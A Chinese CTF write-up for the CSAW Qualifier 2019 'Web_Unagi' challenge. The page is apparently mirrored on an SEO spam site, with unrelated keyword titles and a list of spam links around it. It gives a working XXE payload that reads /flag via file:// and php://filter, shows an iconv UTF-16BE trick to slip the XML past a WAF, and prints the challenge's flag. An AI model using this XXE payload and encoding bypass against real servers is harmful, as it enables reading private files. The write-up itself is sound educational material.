当前位置: 首页 > news >正文

昆明学院网站建设与维护试题百度竞价推广屏蔽软件

昆明学院网站建设与维护试题,百度竞价推广屏蔽软件,h5网站模板开发,云南网站开发网络公司前10[CSAWQual 2019]Web_Unagi 1 解题流程1.1 分析1.2 解题 2 思考总结 1 解题流程 这篇博客讲了xml进行编码转换绕过的原理:https://www.shawroot.cc/156.html 1.1 分析 页面可以上传,上传一句话php失败,点击示例发现是xml格式,那…

[CSAWQual 2019]Web_Unagi

  • 1 解题流程
    • 1.1 分析
    • 1.2 解题
  • 2 思考总结

1

1 解题流程

这篇博客讲了xml进行编码转换绕过的原理:https://www.shawroot.cc/156.html

1.1 分析

  1. 页面可以上传,上传一句话php失败,点击示例发现是xml格式,那么就是XXE注入了
    2
  2. 点击about得到flag位置: Flag is located at /flag, come get it

1.2 解题

  1. 编写XXE注入文件,以xml结尾
    <?xml version='1.0'?>
    <!DOCTYPE users [
    <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag" >]>
    或
    <!ENTITY xxe SYSTEM "file:///flag" >]>
    <users><user><username>bob</username><password>passwd2</password><name>Bob</name><email>bob@fakesite.com</email>  <group>CSAW2019</group><intro>&xxe;</intro></user>
    </users>
    
  2. 尝试上传,发现还是被拦截了,这时候可以查询如何绕过WAF
    xml文档不仅可以用UTF-8编码,也可以用UTF-16、UTF-32和EBCDIC编码。
    在这些编码的帮助下,使用正则表达式可以很容易地绕过WAF,因为在这种类型的WAF中,正则表达式通常仅配置为单字符集。
    在linux中使用命令将xml转换为16进制
    cat 1.xml | iconv -f UTF-8 -t UTF-16BE > x16.xml
  3. 上传即可获取flag
    flag{5325a120-326c-4829-8778-22c54362a7b4}

2 思考总结

编写xml注意点:
1、属性名大小写要区分
2、flag很长,放在其他属性中只能输出部分,而intro意为introduce个人简介,可以输出长内容

http://www.mmbaike.com/news/93758.html

相关文章:

  • 安装php和mysql网站b站推广网站2022
  • 成都最近疫情贵阳网站优化公司
  • 重庆会计之家是谁做的网站广州seo招聘信息
  • 优化大师软件下载88个seo网站优化基础知识点
  • 2024年5月新冠高峰太原seo培训
  • sql server网站建设百度seo公司
  • 网站标签优化制作网站的app
  • 一个网站的域名突然换了电商网站策划
  • 上海网络科技有限公司排名谷歌seo是什么职业
  • flashfxp怎么做网站搜索关键词优化
  • 中山比好的做网站的公司国产十大erp软件
  • 网站建设加盟代理sem和seo区别与联系
  • 动态网站设计和管理网站优化排名公司
  • 厦门网站优化推广托管竞价推广公司
  • 高端网站开发公司有哪些百度服务电话在线人工
  • 微信企业网站模板在线生成个人网站源码
  • 请问番禺哪里有做网站的电商平台发展现状与趋势
  • 网站建设需百度竞价外包
  • 长春哪家做网站做的好北京官网优化公司
  • 福州做网站企业杭州seo的优化
  • 张家口网站设计最新seo课程
  • 扬州做网站seo优化推广业务员招聘
  • 设计网站可能遇到的问题河南网站公司
  • 网站建设策划书论文最佳的资源搜索引擎
  • 推广qq群的网站上海今天最新发布会
  • 柳州网站建设推荐三只松鼠营销策划书
  • 个人怎么做网站优化网络营销的5种方式
  • 孟州哪里可以做网站合肥网络seo
  • 大连城乡建设网站阿里指数怎么没有了
  • 17网站一起做seo优化排名工具